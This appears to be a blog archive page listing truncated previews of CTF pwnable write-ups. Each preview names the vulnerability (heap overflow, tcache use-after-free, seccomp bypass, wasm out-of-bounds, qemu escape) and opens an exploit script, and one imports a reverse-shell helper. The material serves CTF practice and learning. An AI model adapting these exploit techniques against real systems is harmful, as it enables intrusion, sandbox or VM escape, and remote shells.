2018/12

· CTF/2016
Category : pwnable Summary : Lua script, out-of-bounds (OOB) access, integer overflow Exploit: #!/usr/bin/python from pwn import * import sys s = process('./grunt') ru = s.recvuntil rl = s.recvline rr = s.recv rg = s.recvregex sl = s.sendline ss = s.send script = ''' -- Lukachu -- Hannobat -- Andyball -- Airmackly function trigger(obj) pokemon.swapAttack(obj, 0, 1) -- 1 2 pokemon.duplicateAttack(obj) -- 1 2 2 end local ..
· CTF/2016
Category : pwnable Summary : bypass seccomp, close(0x8000000000000002), overwrite parent process memory Exploit: #!/usr/bin/python from pwn import * s = process('./tea') ru = s.recvuntil rl = s.recvline rr = s.recv rg = s.recvregex sl = s.sendline ss = s.send def parse_maps(maps): res = {} get_base = lambda x : int(x.split('-')[0], 16) for line in maps.splitlines(): if 'r-x' in line and 'libc' in ..
· CTF/2016
Category : pwnable Summary : uninitialized variable Exploit: #!/usr/bin/python from pwn import * def cmd_polish_sum(nums): ru('> ') sl(str(2)) ru('Operator: ') sl('S') for i in range(len(nums)): ru('Operand: ') sl(str(nums[i])) ru('Operand: ') sl('.') rl() def cmd_sign(num): ru('> ') sl(str(5)) sl(str(num)) def cmd_read_note(): ru('> ') sl(str(1)) ru('Your note: ') note = rl(False) return note s =..
· CTF/2016
Category : pwnable Summary : heap overflow Exploit: #!/usr/bin/python from pwn import * def cmd_add(alloc_size, input_size, name, data): ru('Action') sl(str(0)) ru('size of description: ') sl(str(alloc_size)) ru('name: ') sl(name) ru('text length: ') sl(str(input_size)) ru('text: ') sl(data) def cmd_del(idx): ru('Action') sl(str(1)) ru('index: ') sl(str(idx)) def cmd_show(idx): ru('Action') sl(str..
· CTF/2018
Category : pwnable Summary : wasm, buffer overflow (bof), trigger function table index out-of-bounds (oob) Exploit: #!/usr/bin/python from pwn import * from paul45 import reverse_shell import requests as r URL = 'http://0:23333' def add_person(name, is_tutor): res = r.get(URL + '/add_person', params={'name':name, 'is_tutor':is_tutor}).text idx = int(res[len('create person done, person id = '..
· CTF/2018
Category : pwnable CLV24893 Solves Pwn me, and Prove yourself nc clv2.pwn.seccon.jp 31337 Summary : tcache, use-after-free Exploit: #!/usr/bin/python from pwn import * def cmd_register(name): ru('[E]xit\n') sl('R') ru('name?\n') sl(name) return rl(False).split(' ')[0] def cmd_login(name): ru('[E]xit\n') sl('L') ru('User : ') sl(name) def cmd_play(): ru('[E]xit\n') sl('P') def cmd_add_prov(method, w..
· CTF/2018
Category : pwnable Summary : qemu escape Exploit: #include #include #include #include #include #include #include #include #include #define OOO_ALLOCATE 0x000000 #define OOO_FREE 0x100000 #define OOO_WRITE 0x200000 #define MAP_SIZE 0x1000000 #define OOO_BIN_BASE 0x1317940 #define FREE_GOT 0x11301a0 #define OOO_MAGIC_GADGET 0x6e65f9 int fd; char *mmio; uint64_t ooo_read(uint32_t idx, uint32_t offset..
· CTF/2017
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define IOMEM_A 0xfe900000 #define IOMEM_B 0xfea00000 #define IOPORT_A 0xc000 #define IOPORT_B 0xc100 #define MMIO_SRC 0x04 #define MMIO_DST 0x08 #define MMIO_COPY 0x20 #define MMIO_CMD 0x24 #define MMIO_TIMER 0x80 #define MMIO_EXPIRE_LO 0x88 #define MMIO_EXP..
pwn3r_45